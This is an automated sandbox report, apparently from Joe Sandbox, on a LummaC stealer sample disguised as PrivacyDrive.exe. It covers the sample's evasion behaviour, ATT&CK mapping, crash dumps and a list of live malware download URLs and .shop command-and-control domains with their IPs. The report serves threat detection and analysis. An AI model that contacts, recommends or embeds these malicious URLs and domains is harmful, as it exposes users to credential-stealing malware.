Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe TID: 2152

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: PrivacyDrive.exe, 00000013.00000002.2001544808.0000000001978000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961859622.00000000018AB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018BC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

API call chain: ExitProcess graph end node

graph_19-46685

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

19_2_0106C583

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101055F mov edx, dword ptr fs:[00000030h]	19_2_0101055F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01010B1F mov eax, dword ptr fs:[00000030h]	19_2_01010B1F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101116F mov eax, dword ptr fs:[00000030h]	19_2_0101116F
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_0101116E mov eax, dword ptr fs:[00000030h]	19_2_0101116E
Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe	Code function: 19_2_01010ECF mov eax, dword ptr fs:[00000030h]	19_2_01010ECF

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: PrivacyDrive.exe	String found in binary or memory: abortinoiwiam.shop
Source: PrivacyDrive.exe	String found in binary or memory: pumpkinkwquo.shop
Source: PrivacyDrive.exe	String found in binary or memory: covvercilverow.shop
Source: PrivacyDrive.exe	String found in binary or memory: surroundeocw.shop
Source: PrivacyDrive.exe	String found in binary or memory: defenddsouneuw.shop
Source: PrivacyDrive.exe	String found in binary or memory: racedsuitreow.shop
Source: PrivacyDrive.exe	String found in binary or memory: priooozekw.shop
Source: PrivacyDrive.exe	String found in binary or memory: deallyharvenw.shop
Source: PrivacyDrive.exe	String found in binary or memory: candleduseiwo.shop

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	1 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	1 Virtualization/Sandbox Evasion	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Process Injection	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	22 System Information Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Rundll32	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
https://finalstepgo.com/uploads/il2.txt	100%	Avira URL Cloud	malware

Source	Detection	Scanner	Label
http://www.broofa.com	0%	URL Reputation	safe
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	0%	URL Reputation	safe
https://csp.withgoogle.com/csp/lcreport/	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://domains.google.com/suggest/flow	0%	URL Reputation	safe
https://finalstepgo.com/favicon.ico	100%	Avira URL Cloud	malware
pumpkinkwquo.shop	100%	Avira URL Cloud	malware
deallyharvenw.shop	100%	Avira URL Cloud	malware
covvercilverow.shop	100%	Avira URL Cloud	malware
https://finalstepgo.com/uploads/il222.zip	100%	Avira URL Cloud	malware
https://www.google.com/async/newtab_promos	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
abortinoiwiam.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/apib	100%	Avira URL Cloud	malware
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0	0%	Avira URL Cloud	safe
http://www.privacy-drive.comx	0%	Avira URL Cloud	safe
defenddsouneuw.shop	100%	Avira URL Cloud	malware
https://plus.google.com	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/w	100%	Avira URL Cloud	malware
https://www.google.com/async/ddljson?async=ntp:2	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
priooozekw.shop	100%	Avira URL Cloud	malware
https://play.google.com/log?format=json&hasfast=true	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/	100%	Avira URL Cloud	malware
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	0%	Avira URL Cloud	safe
surroundeocw.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/api	100%	Avira URL Cloud	malware
racedsuitreow.shop	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/_	100%	Avira URL Cloud	malware
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	0%	Avira URL Cloud	safe
candleduseiwo.shop	100%	Avira URL Cloud	malware
https://clients6.google.com	0%	Avira URL Cloud	safe
https://racedsuitreow.shop/api4	100%	Avira URL Cloud	malware
https://racedsuitreow.shop/api6	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
plus.l.google.com	142.250.184.238	true	false	unknown
play.google.com	142.250.186.110	true	false	unknown
www.google.com	142.250.185.132	true	false	unknown
racedsuitreow.shop	172.67.206.221	true	true	unknown
finalstepgo.com	185.255.122.133	true	false	unknown
apis.google.com	unknown	unknown	true	unknown
candleduseiwo.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://finalstepgo.com/favicon.ico	false	Avira URL Cloud: malware	unknown
https://finalstepgo.com/uploads/il222.zip	false	Avira URL Cloud: malware	unknown
covvercilverow.shop	true	Avira URL Cloud: malware	unknown
pumpkinkwquo.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/async/newtab_promos	false	Avira URL Cloud: safe	unknown
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SpvAvsXfWWo.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-MoqWi0fF1M09Ccs-6QfulXvxfdg/cb=gapi.loaded_0	false	Avira URL Cloud: safe	unknown
abortinoiwiam.shop	true	Avira URL Cloud: malware	unknown
deallyharvenw.shop	true	Avira URL Cloud: malware	unknown
defenddsouneuw.shop	true	Avira URL Cloud: malware	unknown
priooozekw.shop	true	Avira URL Cloud: malware	unknown
https://www.google.com/async/ddljson?async=ntp:2	false	Avira URL Cloud: safe	unknown
https://play.google.com/log?format=json&hasfast=true	false	Avira URL Cloud: safe	unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/api	true	Avira URL Cloud: malware	unknown
surroundeocw.shop	true	Avira URL Cloud: malware	unknown
racedsuitreow.shop	true	Avira URL Cloud: malware	unknown
candleduseiwo.shop	true	Avira URL Cloud: malware	unknown
https://finalstepgo.com/uploads/il2.txt	true		unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	PrivacyDrive.exe, 00000013.00000003.1961859622.00000000018AB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961835609.00000000018FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.broofa.com	chromecache_138.1.dr	false	URL Reputation: safe	unknown
https://racedsuitreow.shop/apib	PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.privacy-drive.comx	PrivacyDrive.exe, 00000013.00000000.1876072666.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000013.00000003.1953924428.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1	chromecache_141.1.dr	false	URL Reputation: safe	unknown
https://racedsuitreow.shop/w	PrivacyDrive.exe, 00000013.00000003.1972562223.000000000190A000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2001459062.000000000190E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://plus.google.com	chromecache_141.1.dr	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	PrivacyDrive.exe, 00000013.00000003.1961859622.00000000018AB000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000003.1961835609.00000000018FB000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error	PrivacyDrive.exe, 00000013.00000002.2000991866.000000000187B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/	PrivacyDrive.exe, 00000013.00000003.1972562223.000000000190A000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018B0000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2001459062.000000000190E000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000013.00000002.2000991866.0000000001896000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://csp.withgoogle.com/csp/lcreport/	chromecache_141.1.dr	false	URL Reputation: safe	unknown
https://racedsuitreow.shop/_	PrivacyDrive.exe, 00000013.00000003.1961859622.0000000001883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://apis.google.com	chromecache_138.1.dr, chromecache_141.1.dr	false	URL Reputation: safe	unknown
https://domains.google.com/suggest/flow	chromecache_141.1.dr	false	URL Reputation: safe	unknown
https://racedsuitreow.shop/api4	PrivacyDrive.exe, 00000013.00000003.1961859622.0000000001883000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://clients6.google.com	chromecache_141.1.dr	false	Avira URL Cloud: safe	unknown
https://racedsuitreow.shop/api6	PrivacyDrive.exe, 00000013.00000002.2000991866.00000000018DA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
172.67.206.221	racedsuitreow.shop	United States	13335	CLOUDFLARENETUS	true
185.255.122.133	finalstepgo.com	Netherlands	42237	ICMESE	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
142.250.186.110	play.google.com	United States	15169	GOOGLEUS	false
142.250.184.238	plus.l.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.17
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519577
Start date and time:	2024-09-26 17:40:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://finalstepgo.com/uploads/il2.txt
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.win@27/35@10/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 20 Number of non-executed functions: 195

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, TextInputHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.184.206, 173.194.76.84, 34.104.35.123, 192.229.221.95, 142.250.184.227, 142.250.185.106, 216.58.212.170, 216.58.206.42, 142.250.186.170, 216.58.212.138, 142.250.185.234, 216.58.206.74, 142.250.184.234, 142.250.185.138, 142.250.185.170, 142.250.184.202, 142.250.185.74, 142.250.186.42, 142.250.181.234, 142.250.185.202, 172.217.16.138, 142.250.185.131, 199.232.210.172, 52.168.117.173, 216.58.206.78, 20.42.65.92
Excluded domains from analysis (whitelisted): www.bing.com, clients1.google.com, onedsblobprdeus16.eastus.cloudapp.azure.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, ogads-pa.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, edgedl.me.gvt1.com, evoke-windowsservices-tas.msedge.net, blobcollector.events.data.trafficmanager.net, update.googleapis.com, umwatson.events.data.microsoft.com, clients.l.google.com, www.gstatic.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://finalstepgo.com/uploads/il2.txt

Simulations

Behavior and APIs

Time	Type	Description
11:42:08	API Interceptor	2x Sleep call for process: PrivacyDrive.exe modified
11:42:12	API Interceptor	1x Sleep call for process: WerFault.exe modified

LLM Input / Output

Input

Output

URL: https://finalstepgo.com/uploads/il2.txt Model: jbxai

{
"brand":["Globi"],
"contains_trigger_text":true,
"trigger_text":"Click here to view document",
"prominent_button_name":"VIEW SHARED FILE",
"text_input_field_labels":["Globi"],
"pdf_icon_visible":true,
"has_visible_captcha":false,
"has_urgent_text":true,
"has_visible_qrcode":false}

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_PrivacyDrive.exe_fef1a7949e4fa8cb69f4d5963b96612fcca58a7_7d659330_04139ed1-6b2b-413a-87d3-3eb36da0d4e9\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.125242963341803
Encrypted:	false
SSDEEP:	192:sAVfGzYUK0Pdz4jBCZr8kFjtzuiFnZ24IO8S:ZuEURPdz4jgtzuiFnY4IO8S
MD5:	036545E63B2CABCF7D407BA9C3A69829
SHA1:	C3317BA7B24AAE964B7F7CBDDC5A85575BFF1F76
SHA-256:	59A1F070AA5ED083AF10ED05C596026A322B3ECF9494A02BC28033C22AB96770
SHA-512:	0C5FC13FA17DCBB2DAEA6CDB1A79D68271616643F27636631D42202756D9114E5006DECDC5FCB48134FCEEA883E58A3FDEDBEEF1390F0D364F5F6511C32A29DB
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.8.3.8.9.3.0.2.5.0.8.4.5.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.8.3.8.9.3.0.8.8.7.8.5.8.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.1.3.9.e.d.1.-.6.b.2.b.-.4.1.3.a.-.8.7.d.3.-.3.e.b.3.6.d.a.0.d.4.e.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.3.8.d.3.4.d.-.a.7.c.e.-.4.9.4.5.-.8.2.0.9.-.1.2.3.1.1.4.5.9.6.3.0.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.r.i.v.a.c.y.D.r.i.v.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.6.c.-.0.0.0.1.-.0.0.1.7.-.1.9.8.9.-.3.d.a.0.2.a.1.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.8.f.2.e.4.0.a.8.6.4.b.d.2.7.1.9.8.0.3.2.4.7.b.3.9.f.f.3.2.6.d.e.0.0.0.0.0.9.0.4.!.0.0.0.0.0.3.a.c.1.9.1.b.2.3.5.b.3.a.8.6.7.5.3.9.7.2.0.0.7.0.a.5.e.6.c.a.1.1.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD517.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Sep 26 15:42:10 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	116438
Entropy (8bit):	2.1691332107466175
Encrypted:	false
SSDEEP:	768:bIPLcRipB6ubUp4RGvskIlf29C1jHWOBgX:bqLcub+vsk+O9Cx7B6
MD5:	DCB872E20785CDF6B853BA65E4279024
SHA1:	9055BBE5C7E6CB508550624D9F9220A0CEF9202C
SHA-256:	671935ED70E863CF6B78283E079D5F547F462636E66E42FED7A8870B452A2C20
SHA-512:	CD740C352575F206D8096C58ADAFFC5F607B7EBF2B0B0A079CB5D4722815509534F5BB6ECA5BB410ECD92BAD26891B860D167362C7D22343BF9FDA1E374372CE
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .........f............D...............X.......T...4%...........T..........`.......8...........T............C...............%..........t'..............................................................................eJ.......(......GenuineIntel............T.......l.....f............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD6DD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8414
Entropy (8bit):	3.690844848996234
Encrypted:	false
SSDEEP:	192:R6l7wVeJK5F6yjK9T6Yk3SUGgZvngmfDJatppDt89bYDsfXIm:R6lXJCF68K9T6Y0SUGcvngmfDJatGYo1
MD5:	05D794A31E7A5D4D8AE22F433D127E9E
SHA1:	44B27DF1E73F6C19BC841ACDC43C3B31683EC245
SHA-256:	1A493F4D3582593D5F105B689715EE3F138B2A9D35609708B56ECF82E1D117A0
SHA-512:	7E9F8BE42289CB6A8B2BDE8DE6422A0179DC88890DA16687C40B0E9EC8EBBD9BEAE840BF324867184AF7061DBC71DB46DDDF6C32343605C2D5F716369B68F09F
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.4.<./.P.i.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD70D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4776
Entropy (8bit):	4.44875165314637
Encrypted:	false
SSDEEP:	48:cvIwWl8zstJg77aI9dqWda80ajvYm8M4JwuTfleFeKo+q8vCflQYm1HAcHyUd:uIjfHI7fLdl2JwuT92oKC9Bm1HAcHyUd
MD5:	E9B912B789901860BBCE687D5A4D7B1E
SHA1:	71B93D546A8BB3BC959E888841F496D967C42F70
SHA-256:	3E4A14168A2E3A6791386816D711C7BE7A4E80721A93D4F21BB2149EC5CA34EB
